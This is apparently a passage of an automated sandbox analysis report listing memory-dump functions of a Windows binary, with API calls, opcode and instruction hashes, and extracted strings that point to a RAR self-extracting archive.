                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Find$FileFirst$CloseErrorLast
                          • String ID:
                          • API String ID: 1464966427-0
                          • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                          • Instruction ID: 95b45625ce718f715dcb9fae3c64c7cbf9292c7af2c55a51065d43f706051ad4
                          • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                          • Instruction Fuzzy Hash: 38F0A462D0C24185DE15BB75A2001B9B7609F1BBB4F149334EA3D876D7DE2CD4448744
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF64D33207E), ref: 00007FF64D3320F6
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                          • Instruction ID: caada8bc222815af566ecbd36299d3e64408f6e078dd5b67ada6d2aea4762683
                          • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                          • Instruction Fuzzy Hash: 55F0AF22E0C68295FB26FB21E241379A660EB16B78F585334E73C855D4EF28D895C300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                          • Instruction ID: de7c1d971965f48cf931e04887a659cfb386f15967ad82f53b8a71419ab9fcd6
                          • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                          • Instruction Fuzzy Hash: 93F05855F0D20B85FF2677B168203B592A09F8B7A0F081630DD2EC62C2FE2CB4808210
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: File
                          • String ID:
                          • API String ID: 749574446-0
                          • Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                          • Instruction ID: 761b6b757c6fffc17048506ac34241fae059259afc50b36c8a714b110f3e0de6
                          • Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                          • Instruction Fuzzy Hash: 00E0C216F2891582EF31FB3ADC426789320FF8EF84B482030DE0C87762EE28C4858A00
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID:
                          • API String ID: 3081899298-0
                          • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                          • Instruction ID: 4daddc2f00995593e563d33394b864b04927792d4ad46072401c38a987bb9c1b
                          • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                          • Instruction Fuzzy Hash: 56D01216D0D44192DD11F735995203C6350AF97735FA41730D63EC1AE1DE1D9496A311
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID:
                          • API String ID: 1611563598-0
                          • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                          • Instruction ID: b774124163f6bd5e161cc00fffa60b40a7621531dd811975f314de877e5256aa
                          • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                          • Instruction Fuzzy Hash: CAC08C21F09502C1DA087B26C8C901813A4BB45B04B604034C50CC1160EE2CC4EA9385
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                          • Instruction ID: 273d6a60a3f5391fa2f0cb7c8ca567cb9703647f4a135f2aca41761e2928aaff
                          • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                          • Instruction Fuzzy Hash: 65317436A08F8185DB61EF25E8502AEB3A0FB89B54F540135EA8D83B99EF3CD545C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                          • API String ID: 3215553584-2617248754
                          • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                          • Instruction ID: da4bf95334642b57ac178f195d1f30389e23f4314ca5ae2f2b2777a2bfd555d3
                          • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                          • Instruction Fuzzy Hash: F241CD72E09B4189E716EF24E8517AD77E4EB19798F004136EE8C93B58EE3CD025C344
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                          • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                          • API String ID: 2721297748-1533471033
                          • Opcode ID: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
                          • Instruction ID: db6cb17aaad64f29228fadc74323e3801ffaf1d15264fa22dc00b6ffa286d5b8
                          • Opcode Fuzzy Hash: 99020ba5446ec8b5071b5be278ebc62a02c6a64c5a04705e5c2bdc59161e89ed
                          • Instruction Fuzzy Hash: 9781AEA2F1CA0285FB02FBA5D8502EDA371AF4A788F405135DE1D9769AFE3DD50AC344
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Item$Text
                          • String ID: LICENSEDLG
                          • API String ID: 1601838975-2177901306
                          • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                          • Instruction ID: 369c8d4df2bbde4039a13a7956e4cbef3e77a4512b7c2bdd283313c2c52ab61b
                          • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                          • Instruction Fuzzy Hash: 4641A325E0CA1282F712BB15E854779A3A1AF86F85F044035E90EC3BA5EF7EE945C300
                          APIs
                          • GetModuleHandleW.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D35162B
                          • GetProcAddress.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D351648
                          • GetProcAddress.KERNEL32(?,?,?,00007FF64D351573,?,?,?,00007FF64D35192A), ref: 00007FF64D351664
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                          • API String ID: 667068680-1718035505
                          • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                          • Instruction ID: 33d9dd73a86f7e81d6175a0738be6eb1aa9a59cc3dec2d9030320cfb61258e7f
                          • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                          • Instruction Fuzzy Hash: 0711C921E1EB0282FE67BB11B960278E3E56F4A798F5D5435DC1DC6790FE7CA8848710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: .rar$exe$rar$sfx
                          • API String ID: 3668304517-630704357
                          • Opcode ID: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
                          • Instruction ID: 5a8cdf124213e4332b4a19640fd5b20d38fda94d3202c0c960e50b5e1d4a1869
                          • Opcode Fuzzy Hash: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
                          • Instruction Fuzzy Hash: 53A1E262E1CA4690EB02BF25E9542BCA361BF46BA8F001235DD1D87BE5EF7CE541C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                          • API String ID: 2102711378-639343689
                          • Opcode ID: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
                          • Instruction ID: ecb97b09b6a6822784ebbc1c8da194293451c7af66bc8f9875abf03981603a19
                          • Opcode Fuzzy Hash: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
                          • Instruction Fuzzy Hash: 7151C562F1C74145FB12FB65E8512FDA3A0AF467A8F044135DE1D976E6FE3CA485C280
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID:
                          • String ID: RENAMEDLG$REPLACEFILEDLG
                          • API String ID: 0-56093855
                          • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                          • Instruction ID: 9602cb73329f0eaa78341484b5c6a2a2278ceaa77d295e924008ae787303f323
                          • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                          • Instruction Fuzzy Hash: 3B21E566E0DB4791FA12BB56E844175E7A1EF4BB88F580036F98DC7260EE3DE5988300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                          • Instruction ID: cfacd50457315481ed232896ba0e6a3f458f270949f84c4b9c86cb72e7e4b701
                          • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                          • Instruction Fuzzy Hash: 1681DE22E1C65289F732BB65D8506BDA6A0BB47B88F445135DE0ED3B95EF3CA446C310
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                          • String ID:
                          • API String ID: 3659116390-0
                          • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                          • Instruction ID: 8c6ee60384eef3ac6ee6d539ba49d093ad8c24725119e5b4c31d98715ac60c86
                          • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                          • Instruction Fuzzy Hash: AE51A232E1CA5185E722EB65E4443ACBBB1FB4AB98F049135DE4A97A98EF38D145C700
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocString
                          • String ID:
                          • API String ID: 262959230-0
                          • Opcode ID: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
                          • Instruction ID: e1774a551c9f9202e7217bf315b7848775163e1924c6b22158dda26037262f96
                          • Opcode Fuzzy Hash: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
                          • Instruction Fuzzy Hash: BA41A126E0D64689EB16BF219460279B2D1EF0ABE8F184734EA6DC77D5EF3CE5518300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                          • Instruction ID: 328b02175a505d37891c7526f7997ac826af79e4d74475c8c9d4af4019e20cb2
                          • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                          • Instruction Fuzzy Hash: 4E119176E1CA0781FA763124E94E3BD91416F773A0F486234EA7E8A6D6FE2CA4404205
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Message$DispatchObjectPeekSingleTranslateWait
                          • String ID:
                          • API String ID: 3621893840-0
                          • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                          • Instruction ID: 25341adf4fe0c801bb3c6eacea8b4ee6a205b0481a94b2a233b21d158dad3d25
                          • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
